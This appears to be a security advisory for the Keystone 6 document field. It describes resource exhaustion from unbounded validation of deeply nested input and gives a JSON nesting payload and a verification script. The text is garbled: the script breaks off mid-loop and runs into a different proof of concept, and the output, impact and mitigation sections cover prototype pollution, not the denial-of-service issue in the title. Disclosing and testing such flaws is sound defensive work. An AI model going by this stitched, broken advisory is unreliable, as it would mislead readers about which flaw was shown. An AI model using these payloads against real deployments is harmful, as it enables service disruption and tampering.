# Keystone Zero Day Research # Document field validation can be abused for resource exhaustion ### Summary Document input validation and normalization traverse the full document without explicit depth or size limits. Large or deeply nested documents can cause high CPU/memory usage. ### CVSS CVSS v4.0 Base Score: 5.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L) ### Affected Packages - @keystone-6/fields-document ### Affected Versions - Keystone 6.x (main branch behavior) ### References - [fields-document index.ts](https://github.com/keystonejs/keystone/blob/main/packages/fields-document/src/index.ts#L101-L107) - [validation.ts](https://github.com/keystonejs/keystone/blob/main/packages/fields-document/src/validation.ts#L177-L188) ### Preconditions - A list uses the document field. - The GraphQL API is exposed to untrusted users. ### Blackbox Test Steps 1. Submit a document payload with extreme depth or size through the public GraphQL API. 2. Observe CPU spikes or timeouts during validation and normalization. ### Blackbox Payload (deep nesting) ```json [ { "type": "paragraph", "children": [ { "type": "paragraph", "children": [ { "type": "paragraph", "children": [ { "type": "paragraph", "children": [ { "type": "paragraph", "children": [ { "text": "x" } ] } ] } ] } ] } ] } ] ``` ### Observed Behavior - Validation and normalization run on the entire tree. - Very large inputs can cause high CPU or memory usage. ### Verification (local) ```bash pnpm -C packages/fields-document exec node --import tsx -e 'const { validateAndNormalizeDocument } = (await import("./src/validation.ts")).default; const documentFeatures={ formatting:{ inlineMarks:{bold:false,italic:false,underline:false,strikethrough:false,code:false,superscript:false,subscript:false,keyboard:false}, listTypes:{ordered:false,unordered:false}, alignment:{center:false,end:false}, headingLevels:[], blockTypes:{blockquote:false,code:false}, softBreaks:false }, links:false, dividers:false, layouts:[] }; const relationships={}; const componentBlocks={}; const makeDeep=n=>{ let node={ type:"paragraph", children:[{ text:"x" }] }; for(let i=0;i{ let node={ type:"paragraph", children:[{ text:"x" }] }; for(let i=0;i null }; const root=DocumentRenderer({document, componentBlocks}); const isElement=x=>x&&typeof x==="object"&&"type" in x&&"props" in x; const flatten=ch=>Array.isArray(ch)?ch:[ch]; const walk=node=>{ if(node==null) return null; if(Array.isArray(node)){ for(const n of node){ const r=walk(n); if(r) return r; } return null; } if(!isElement(node)) return null; if(typeof node.type==="function"){ return walk(node.type(node.props)); } const children = node.props && node.props.children!=null ? flatten(node.props.children) : []; for(const c of children){ const r=walk(c); if(r) return r; } return null; }; walk(root); console.log({ pollutedOnEmpty: ({}).polluted, pollutedOnNew: (new (function(){})()).polluted });' ``` ```text { pollutedOnEmpty: { '$$typeof': Symbol(react.transitional.element), type: [Function: DocumentNode], key: '0', props: { node: [Object], componentBlocks: [Object], renderers: [Object] }, _owner: null, _store: {} }, pollutedOnNew: { '$$typeof': Symbol(react.transitional.element), type: [Function: DocumentNode], key: '0', props: { node: [Object], componentBlocks: [Object], renderers: [Object] }, _owner: null, _store: {} } } ``` ### Impact Prototype pollution can alter application behavior and security assumptions in downstream code. ### Mitigation Guidance - Reject `__proto__`, `constructor`, and `prototype` in `propPath`. - Deep clone into objects created with null prototypes. ### Whitebox Analysis - `propPath` accepts arbitrary string keys in validation. [structure-validation.ts](https://github.com/keystonejs/keystone/blob/main/packages/fields-document/src/structure-validation.ts#L100-L114) - `DocumentRenderer` applies `propPath` via a recursive setter without reserved key checks. [document-renderer index.tsx](https://github.com/keystonejs/keystone/blob/main/packages/document-renderer/src/index.tsx#L203-L220)